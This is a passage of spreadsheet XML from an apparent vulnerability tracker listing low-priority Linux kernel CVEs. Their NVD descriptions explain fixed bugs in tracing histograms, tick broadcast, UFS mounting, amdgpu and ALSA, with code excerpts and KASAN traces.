      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97917</t>
        </is>
      </c>
      <c r="D565" s="5" t="inlineStr"/>
      <c r="E565" s="5" t="inlineStr"/>
      <c r="F565" s="5" t="inlineStr"/>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="inlineStr"/>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q565" s="5" t="inlineStr"/>
      <c r="R565" s="5" t="inlineStr"/>
      <c r="S565" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/ivpu: Validate full buffer range in ivpu_to_cpu_addr
Add a size parameter to ivpu_to_cpu_addr() and validate that the
whole [vpu_addr, vpu_addr + size) range stays within the BO.</t>
        </is>
      </c>
      <c r="T565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97917</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97918</t>
        </is>
      </c>
      <c r="D566" s="5" t="inlineStr"/>
      <c r="E566" s="5" t="inlineStr"/>
      <c r="F566" s="5" t="inlineStr"/>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="inlineStr"/>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q566" s="5" t="inlineStr"/>
      <c r="R566" s="5" t="inlineStr"/>
      <c r="S566" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Undo the registration when enabling the histogram trigger fails
Commit 6f86bdeab633 ("tracing: Fix bad hist from corrupting named_triggers
list") described how a trigger that is registered but not on file-&gt;triggers
ends up freed while still on the global named_triggers list, and moved the
registration down so that hist_trigger_enable() follows it immediately. One
path still gets there. hist_trigger_enable() adds the trigger and takes it
straight back out when the event cannot be enabled:
	list_add_tail_rcu(&amp;data-&gt;list, &amp;file-&gt;triggers);
	update_cond_flag(file);
	if (trace_event_trigger_enable_disable(file, 1) &lt; 0) {
		list_del_rcu(&amp;data-&gt;list);
		update_cond_flag(file);
		ret--;
	}
so the list walk in hist_unregister_trigger() matches nothing, test stays
NULL, and the -&gt;free() that would call del_named_trigger() is skipped.
out_unreg falls through to out_free, which frees the trigger anyway:
 BUG: KASAN: slab-use-after-free in find_named_trigger+0xac/0xc0
 Read of size 8 at addr ffff8880091d3160 by task init/1
  find_named_trigger+0xac/0xc0
  hist_register_trigger+0xc1/0xa00
  event_hist_trigger_parse+0x3146/0x6af0
  event_trigger_write+0xce/0x160
 Freed by task 69:
  kfree+0x154/0x420
  trigger_kthread_fn+0xfd/0x160
Leave the trigger where hist_unregister_trigger() can find it and let that
undo the registration, which is the only code that knows all of what
cmd_ops-&gt;init() took: the named list entry, the hist_pad reference, the
reference on the trigger a named histogram is shared with, and the copied
cmd_ops. It also pairs the failed trace_event_trigger_enable_disable(),
whose sm_ref and buffered event reference are otherwise left behind.
Since -&gt;free() releases trigger_data and, for a trigger that does not share
its histogram, hist_data with it, out_unreg can no longer fall through to
out_free. For a trigger that does share, hist_register_trigger() has
already destroyed the caller's hist_data, so the fall-through was reading
freed memory there as well.
Move the enable_timestamps check in hist_unregister_trigger() above the
-&gt;free() call for the same reason: hist_data does not outlive it once the
trigger being removed is the one that owns it.</t>
        </is>
      </c>
      <c r="T566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97918</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97919</t>
        </is>
      </c>
      <c r="D567" s="5" t="inlineStr"/>
      <c r="E567" s="5" t="inlineStr"/>
      <c r="F567" s="5" t="inlineStr"/>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="inlineStr"/>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q567" s="5" t="inlineStr"/>
      <c r="R567" s="5" t="inlineStr"/>
      <c r="S567" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Take the reference before publishing the named histogram trigger
event_hist_trigger_named_init() puts the trigger on the global
named_triggers list and only then takes the reference on the trigger it
shares its histogram with:
	data-&gt;ref++;
	save_named_trigger(data-&gt;named_data-&gt;name, data);
	ret = event_hist_trigger_init(data-&gt;named_data);
	if (ret &lt; 0) {
		kfree(data-&gt;cmd_ops);
		data-&gt;cmd_ops = &amp;trigger_hist_cmd;
	}
	return ret;
event_hist_trigger_init() fails when alloc_hist_pad() cannot allocate, and
nothing takes the trigger back off the list on the way out.
event_hist_trigger_parse() frees it, and the next lookup by name reads the
freed object:
 BUG: KASAN: slab-use-after-free in find_named_trigger+0xac/0xc0
 Read of size 8 at addr ffff888009346860 by task init/1
  find_named_trigger+0xac/0xc0
  hist_register_trigger+0xc1/0xa00
  event_hist_trigger_parse+0x3146/0x6af0
  event_trigger_write+0xce/0x160
 Freed by task 67:
  kfree+0x154/0x420
  trigger_kthread_fn+0xfd/0x160
Do the reference first and publish once it has succeeded, so that nothing
which can fail runs after the trigger becomes findable.</t>
        </is>
      </c>
      <c r="T567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97919</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97920</t>
        </is>
      </c>
      <c r="D568" s="5" t="inlineStr"/>
      <c r="E568" s="5" t="inlineStr"/>
      <c r="F568" s="5" t="inlineStr"/>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="inlineStr"/>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q568" s="5" t="inlineStr"/>
      <c r="R568" s="5" t="inlineStr"/>
      <c r="S568" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Keep the entry count when the histogram stats allocation fails
print_entries() uses n_entries both as the number of sort entries and as
its own return value, so the -ENOMEM it stores when the stats allocation
fails overwrites the count that the cleanup still needs:
	n_entries = tracing_map_sort_entries(map, ...);
	if (n_entries &lt; 0)
		return n_entries;
	...
			if (!stats) {
				n_entries = -ENOMEM;
				goto out;
			}
	...
 out:
	tracing_map_destroy_sort_entries(sort_entries, n_entries);
tracing_map_destroy_sort_entries() takes an unsigned int and loops up to
it, so -ENOMEM arrives as 4294967284. It walks an array of at most
map-&gt;max_elts pointers and calls destroy_sort_entry(), which dereferences
and frees, on whatever lies past the end.
Reading the hist file of a trigger with a .percent value, with that
allocation forced to fail:
  BUG: KASAN: vmalloc-out-of-bounds in tracing_map_destroy_sort_entries+0xa0/0xb0
  Read of size 8 at addr ffffc90000045000 by task init/1
   tracing_map_destroy_sort_entries+0xa0/0xb0
   hist_show+0x6f7/0x1df0
   seq_read_iter+0x2b8/0x1190
   vfs_read+0x176/0xa40
  The buggy address belongs to a 4-page vmalloc region starting at
  ffffc90000041000 allocated at tracing_map_sort_entries+0x5c/0xd50
A few pages further the fault is fatal. The registers at the oops confirm
the bound: the loop's end pointer less the array start, over the pointer
size, is 4294967284.
Return the error in a separate variable and leave n_entries holding the
count, the way tracing_map_sort_entries() does on its own error path.
The stats block is only entered for a value carrying .percent or .graph,
which __create_val_field() has rejected since v6.3, so this cannot be
reached in mainline as it stands. It becomes reachable again with
"tracing: hist: let values keep the percent and graph modifiers", so it
should be applied first.</t>
        </is>
      </c>
      <c r="T568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97920</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97921</t>
        </is>
      </c>
      <c r="D569" s="5" t="inlineStr"/>
      <c r="E569" s="5" t="inlineStr"/>
      <c r="F569" s="5" t="inlineStr"/>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="inlineStr"/>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q569" s="5" t="inlineStr"/>
      <c r="R569" s="5" t="inlineStr"/>
      <c r="S569" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Free histogram the field rejected for a bad modifier
Writing a hist trigger whose value or variable carries a modifier that is
not allowed there leaks the fields that were built for it.
__create_val_field() takes the field from parse_expr() and stores it in
hist_data-&gt;fields[] only after the modifier checks have run:
	hist_field = parse_expr(hist_data, file, field_str, flags, var_name,
				&amp;n_subexprs);
	...
	if (hist_field-&gt;flags &amp; HIST_FIELD_FL_VAR) {
		if (hist_field-&gt;flags &amp; (...))
			goto err;
	} else {
		if (hist_field-&gt;flags &amp; (...))
			goto err;
	}
	hist_data-&gt;fields[val_idx] = hist_field;
Both checks jump past that store, and the err label returns without
freeing anything. The error unwinds to create_hist_data(), which calls
destroy_hist_data() -&gt; destroy_hist_fields(), and that reaches a field
only by walking fields[]. A field that never got there is unreachable.
commit e0213434fe3e ("tracing: Do not let histogram values have some
modifiers") set ret to -EINVAL and fell through to the store, which left
the field owned by fields[] and freed along with the rest of hist_data.
Splitting the check into a value case and a variable case replaced that
fall-through with a goto that skips it.
With CONFIG_DEBUG_KMEMLEAK, 200 writes of
  # echo 'hist:keys=prev_pid:vals=next_pid.log2' &gt; \
	 events/sched/sched_switch/trigger
each correctly rejected with -EINVAL, leave 332 unreferenced objects
(63744 bytes) reported at create_hist_field(); 200 install and remove
cycles of a valid trigger leave none. A '.log2' field is two
allocations, since create_hist_field() puts the plain field in
operands[0] of the log2 field, and both are reported.
Use destroy_hist_field() rather than __destroy_hist_field() so that
operands[0] is freed as well. It returns early for HIST_FIELD_FL_VAR_REF,
which is what an operand owned by hist_data-&gt;var_refs[] needs; the
rejected field itself is never a var ref, because a var ref never carries
a modifier flag.</t>
        </is>
      </c>
      <c r="T569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97921</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97922</t>
        </is>
      </c>
      <c r="D570" s="5" t="inlineStr"/>
      <c r="E570" s="5" t="inlineStr"/>
      <c r="F570" s="5" t="inlineStr"/>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr"/>
      <c r="S570" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Free histogram var refs regardless of how often they are referenced
Using the same variable three or more times in one hist trigger leaks the
variable reference and its strings when the trigger is removed.
commit 656fe2ba85e8 ("tracing: Use hist trigger's var_ref array to destroy
var_refs") made a trigger's var_refs[] array the only owner of a var ref:
destroy_hist_field() returns early for HIST_FIELD_FL_VAR_REF, so the field
expressions never destroy one. One entry, freed once, no count needed.
commit 8bcebc77e85f ("tracing: Fix histogram code when expression has same
var as value") then made repeated references share one object and added a
count of them. Only the increment side exists, since those expressions
still return early and never drop a reference, so __destroy_hist_field()
sees how many references were created rather than how many are left. It
frees when the decremented count is 0 or 1, so two references work and
three or more leak.
Sharing kept one array entry per object, and create_var_ref() searches and
appends within a single trigger, so nothing outside it holds the object.
Removing a trigger whose variables are still referenced is already refused
by check_var_refs() with -EBUSY. Drop the count and free unconditionally.</t>
        </is>
      </c>
      <c r="T570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97922</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97923</t>
        </is>
      </c>
      <c r="D571" s="5" t="inlineStr"/>
      <c r="E571" s="5" t="inlineStr"/>
      <c r="F571" s="5" t="inlineStr"/>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr"/>
      <c r="S571" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Free histogram the var ref when its initialization fails
create_var_ref() allocates a VAR_REF hist_field and then calls
init_var_ref() to fill it in. When that fails the field is leaked.
commit 656fe2ba85e8 ("tracing: Use hist trigger's var_ref array to destroy
var_refs") made destroy_hist_field() return early for
HIST_FIELD_FL_VAR_REF, since var refs are freed by walking the trigger's
var_refs[] array instead. create_var_ref() adds the field to that array
only after init_var_ref() has succeeded, so on this path the field is in
neither place and nothing frees it. The call was correct when it was
written, before var refs were taken out of destroy_hist_field().
init_var_ref() cannot free it either. The caller owns the field, so
init_var_ref() undoes only its own string allocations and leaves the
field alone. Freeing it there would leave create_var_ref() passing freed
memory to destroy_hist_field(), which reads its flags.
Call __destroy_hist_field(), which frees the field without consulting
the flag.</t>
        </is>
      </c>
      <c r="T571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97923</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97924</t>
        </is>
      </c>
      <c r="D572" s="5" t="inlineStr"/>
      <c r="E572" s="5" t="inlineStr"/>
      <c r="F572" s="5" t="inlineStr"/>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr"/>
      <c r="S572" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing/user_events: Don't destroy fields when event removal fails
destroy_user_event() destroys the event's fields before attempting to
remove the trace event call. If user_event_set_call_visible() fails,
e.g. because the event is still enabled and trace_remove_event_call()
returns -EBUSY, the event is left registered with an irreversibly
destroyed field list. Any subsequent interaction with the event then
operates on an empty field list while it is still fully visible in
tracefs.
Move the field destruction after the call removal, and splice the
field list back onto the event when the removal fails so the event
remains in a consistent state.</t>
        </is>
      </c>
      <c r="T572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97924</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97925</t>
        </is>
      </c>
      <c r="D573" s="5" t="inlineStr"/>
      <c r="E573" s="5" t="inlineStr"/>
      <c r="F573" s="5" t="inlineStr"/>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr"/>
      <c r="S573" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tick/broadcast: Plug clockevents replacement race
朱恺乾 reported and decoded the following race condition when a broadcast
device is replaced:
CPUA					CPUB
 __tick_broadcast_oneshot_control()
   bc = tick_broadcast_device.evtdev;
					tick_install_broadcast_device(dev)
        				clockevents_exchange_device(cur, dev)
					   shutdown(cur);
					   detach(cur);
					   cur-&gt;handler = noop;
					   tick_broadcast_device.evtdev = dev;
  tick_broadcast_set_event(bc, next_event); &lt;- FAIL: arms a detached device.
If the original broadcast device has a restricted interrupt affinity mask
and the last CPU in that mask goes offline then the BUG() in
tick_cleanup_dead_cpu() triggers because the clockevent device is not in
detached state.
The reason for this is that tick_install_broadcast_device() is not
serialized vs. tick broadcast operations.
The obvious cure is to serialize tick_install_broadcast_device() with
tick_broadcast_lock against a concurrent tick broadcast operation.
That requires to split clockevents_exchange_device() into two parts, one
which does the exchange, shutdown and detach operation and the other which
drops the module reference count. This is required because the module
reference cannot be dropped while holding tick_broadcast_lock.
Let clockevents_exchange_device() do both operations as before, but let the
broadcast device code take the two step approach and do the device
exchange under tick_broadcast_lock and drop the module reference count
after releasing it.</t>
        </is>
      </c>
      <c r="T573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97925</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97927</t>
        </is>
      </c>
      <c r="D574" s="5" t="inlineStr"/>
      <c r="E574" s="5" t="inlineStr"/>
      <c r="F574" s="5" t="inlineStr"/>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q574" s="5" t="inlineStr"/>
      <c r="R574" s="5" t="inlineStr"/>
      <c r="S574" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ufs: create the root dentry after loading cylinder metadata
ufs_fill_super() installed sb-&gt;s_root before it loaded the cylinder
group structures for a writable mount:
	sb-&gt;s_root = d_make_root(inode);
	...
	if (!sb_rdonly(sb))
		if (!ufs_read_cylinder_structures(sb))
			goto failed;
When ufs_read_cylinder_structures() failed, the error path freed the
in-core superblock information and set sb-&gt;s_fs_info to NULL while
sb-&gt;s_root stayed installed. get_tree_bdev() then reached
deactivate_locked_super(), and because s_root was present,
generic_shutdown_super() called sync_filesystem() and the put_super
operation. Both dereference UFS_SB(sb), which is now NULL, so a mount
that fails only while reading the cylinder groups oopses during
teardown. A crafted image whose first cylinder group cannot be read
reaches this path.
Load the cylinder group metadata first and create the root dentry last,
so the superblock is published to the VFS only once it is fully set up.
ufs_setup_cstotal() and ufs_read_cylinder_structures() take only the
super_block and do not use the root inode, so the reordering is safe.</t>
        </is>
      </c>
      <c r="T574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97927</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97928</t>
        </is>
      </c>
      <c r="D575" s="5" t="inlineStr"/>
      <c r="E575" s="5" t="inlineStr"/>
      <c r="F575" s="5" t="inlineStr"/>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q575" s="5" t="inlineStr"/>
      <c r="R575" s="5" t="inlineStr"/>
      <c r="S575" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: skip the VMID 0 flush for VRAM
Clear-on-release only runs on VRAM, which amdgpu_ttm_map_buffer() reaches
via its direct MC address without programming a GART window, yet the wipe
still forces a VMID 0 flush. On GFX11 (e.g. Navi33) that spurious SDMA
flush can wedge the engine; only flush when a GART window is actually used.
v2: Let amdgpu_ttm_map_buffer() return whether the VMID 0 flush is needed,
    and drive the clear and copy paths from that. (Christian)
v3: Make the vm_needs_flush output parameter mandatory instead of
    allowing NULL. (Christian)
(cherry picked from commit a306e406e570b74318ff7d80e5b07b540ca1d3a9)</t>
        </is>
      </c>
      <c r="T575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97928</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97929</t>
        </is>
      </c>
      <c r="D576" s="5" t="inlineStr"/>
      <c r="E576" s="5" t="inlineStr"/>
      <c r="F576" s="5" t="inlineStr"/>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q576" s="5" t="inlineStr"/>
      <c r="R576" s="5" t="inlineStr"/>
      <c r="S576" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: usbusx2y: validate URB actual_length in interrupt callback
i_usx2y_in04_int() processes the interrupt URB data without checking
urb-&gt;actual_length.  A short transfer from a malfunctioning device
would cause the handler to process uninitialized heap data from the
kmalloc-allocated in04_buf, which is then copied to the mmap-accessible
ctl_snapshot[] array.
Fix by using kzalloc() for in04_buf to zero-initialize the buffer,
and adding an actual_length check to skip processing on short
transfers while still resubmitting the URB.</t>
        </is>
      </c>
      <c r="T576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97929</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97930</t>
        </is>
      </c>
      <c r="D577" s="5" t="inlineStr"/>
      <c r="E577" s="5" t="inlineStr"/>
      <c r="F577" s="5" t="inlineStr"/>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q577" s="5" t="inlineStr"/>
      <c r="R577" s="5" t="inlineStr"/>
      <c r="S577" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
